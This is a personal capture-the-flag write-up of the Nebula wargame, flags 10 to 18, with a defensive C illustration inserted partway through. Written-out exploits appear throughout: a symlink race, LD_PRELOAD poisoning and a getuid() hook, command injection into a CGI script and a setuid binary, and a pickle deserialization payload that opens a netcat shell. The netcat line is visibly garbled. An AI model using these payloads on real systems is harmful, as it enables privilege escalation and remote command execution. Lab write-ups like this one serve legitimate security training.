神刀安全网

My Nebula Write-up Part #2 [Flag 09-18]

Flag 09: will come back later

Flag 10: Tried LD_DEBUG; exploit the race condition

Exploit a symbolic link and the race condition.

Fill the pipe and redirect standard output to it.

If we can block the setuid binary between the calls to access() and open(), that gives us a lot of time. To block the process, we fill the pipe completely and connect the stdout of flag10 to that pipe so that it blocks during the call to printf().
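As an added defensive illustration (not from this write-up or the Nebula sources): the racy access()-then-open() pattern described above, beside a version that checks the file it actually opened so a symlink swapped in during the window is caught. The temp file and symlink names in the self-check are constructed.

```c
/* Nebula flag10 pattern: a setuid program checks a user path with access()
 * and opens it later. Between the two calls the path can be re-pointed
 * (symlink swap); stalling the process on a full stdout pipe widens the window. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable: check and use name the path twice (time-of-check/time-of-use). */
int open_racy(const char *path) {
    if (access(path, R_OK) != 0)      /* check against the real uid, now */
        return -1;
    return open(path, O_RDONLY);      /* use: may resolve to another file */
}

/* Hardened: open first, then check the object we actually hold. Stricter than
 * access(): the file must be a regular file owned by the real uid. (The other
 * standard fix is dropping privileges with seteuid(getuid()) before the open.) */
int open_checked(const char *path) {
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Self-check on constructed files: a regular file we own plus a symlink to it.
 * Returns 0 when the racy opener follows the link but the checked one refuses it. */
int run_demo(void) {
    char regular[] = "/tmp/nebula10-demo-XXXXXX", link[64];
    int fd = mkstemp(regular);
    if (fd < 0) return 1;
    close(fd);
    snprintf(link, sizeof link, "%s.lnk", regular);
    if (symlink(regular, link) != 0) { unlink(regular); return 2; }
    int racy = open_racy(link), via_link = open_checked(link), direct = open_checked(regular);
    int ok = (racy >= 0 && via_link < 0 && direct >= 0) ? 0 : 3;
    if (racy >= 0) close(racy);
    if (direct >= 0) close(direct);
    unlink(link); unlink(regular);
    return ok;
}
```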

615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

Flag 11:

There are definitely other paths, but this is the path I followed. Should basically poison LD_PRELOAD:

 export LD_PRELOAD=`python -c 'print "\x0a/bin/getflag"*4000'`

Then run:

 python -c 'print "Content-Length: 1\n"' | ./flag11 2>/dev/null

Unfortunately it says getflag is executing on a non-flag account; this doesn't count. I think it's some design flaw currently with level 11, as I saw similar comments by users having the same problem.

Flag 12: OS command injection

 blah;/bin/getflag > /tmp/lv12;echo 1337

Then go and cat /tmp/lv12.

Flag 13: does evil stuff similar to what malware does

We create a shared object and use LD_PRELOAD to hook the getuid() call, similar to how keyloggers in Windows environments hook keyboard handler functions.

Neat stuff ->

 cat getuid.c
 #include <unistd.h>
 /* Replacement getuid(): report the uid the binary expects. */
 uid_t getuid(void) {
     return 1000;
 }
 gcc -fPIC -shared -o newlib.so getuid.c
 export LD_PRELOAD="/home/level13/newlib.so"

Your token is b705702b-76a8-42b0-8844-3adabbe5ac58

Flag 14: abcdefghijklmnopqrstuvwxyz

 import sys
 # Each character was shifted by its position; undo the shift.
 result = ""
 ptr = 0
 with open(sys.argv[1], "r") as f:
     for c in f.read()[:-1]:  # drop the trailing newline
         result += chr(ord(c) - ptr)
         ptr += 1
 print(result)

 cat decrypt.c
 #include <stdio.h>
 #include <string.h>
 int main(int argc, char *argv[]) {
     if (argc < 2)
         return 1;
     /* Subtract each character's index to reverse the encoding. */
     for (int i = 0; i < strlen(argv[1]); i++)
         printf("%c", argv[1][i] - i);
     printf("\n");
     return 0;
 }
 gcc -std=c99 -o decrypt decrypt.c
 ./decrypt $(cat /home/flag14/token)

Flag 15:

 readelf -d flag15 | egrep "NEEDED|RPATH"

Come back later; weird.

Flag 16:

 $username =~ tr/a-z/A-Z/;  # converts to uppercase
 $username =~ s/\s.*//;     # strip everything after a space

-> The bash ${PARAMETER,,} expansion converts a value to lowercase.
-> Now we know that all characters get converted to uppercase, so we create a bash script in /tmp which executes getflag.
-> We cannot specify the absolute path (it would be uppercased too), but we can use a wildcard path which the shell expands to find the right file.
-> The file will be named FLGET; it executes getflag and writes the output to a file flagc in /tmp.

Putting it all together, we construct the following command and URL-encode it:

 ";//FLGET;"

-> This yields %22%3B%2F%2FFLGET%3B%22, and we pass it as username.

Had problems with the approach above when using Firefox, so instead:

 index.cgi?username=" </dev/null;flagvar=/tmp/flg16;${flagvar,,};#

In the encoded format it is:

 index.cgi?username=%22%3C%2Fdev%2Fnull%3Bflagvar%3D%2Ftmp%2Fflg16%3B%24%7Bflagvar%2C%2C%7D%3B%23

This stores the path of the /tmp/flg16 script, which the CGI has converted to uppercase, in the variable flagvar; ${flagvar,,} then converts it back to lowercase so the shell runs the script.

Reference http://wiki.bash-hackers.org/syntax/pe#case_modification

Flag 17:

 import pickle
 import socket
 import os

 # __reduce__ tells pickle how to rebuild the object: here, by calling os.system.
 class payload(object):
     def __reduce__(self):
         comm = "rm /tmp/shell; mknod /tmp/shell p; nc 127.0.0.1 10008 0/tmp/shell"
         return (os.system, (comm,))

 data = pickle.dumps(payload())
 soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 soc.connect(("127.0.0.1", 10007))
 print soc.recv(1024)
 soc.send(data)

Straightforward to get the flag.

Flag 18:

 ulimit -a | grep files
 ulimit -Sn 50
 python -c 'print "login test\r\n"*50+"shell\r\n"' | /home/flag18/flag18 -d test -v -v -v

Overloading the file descriptors? Didn't work well.

Stuck here.

Will come back for Flags 9 and 15 :(
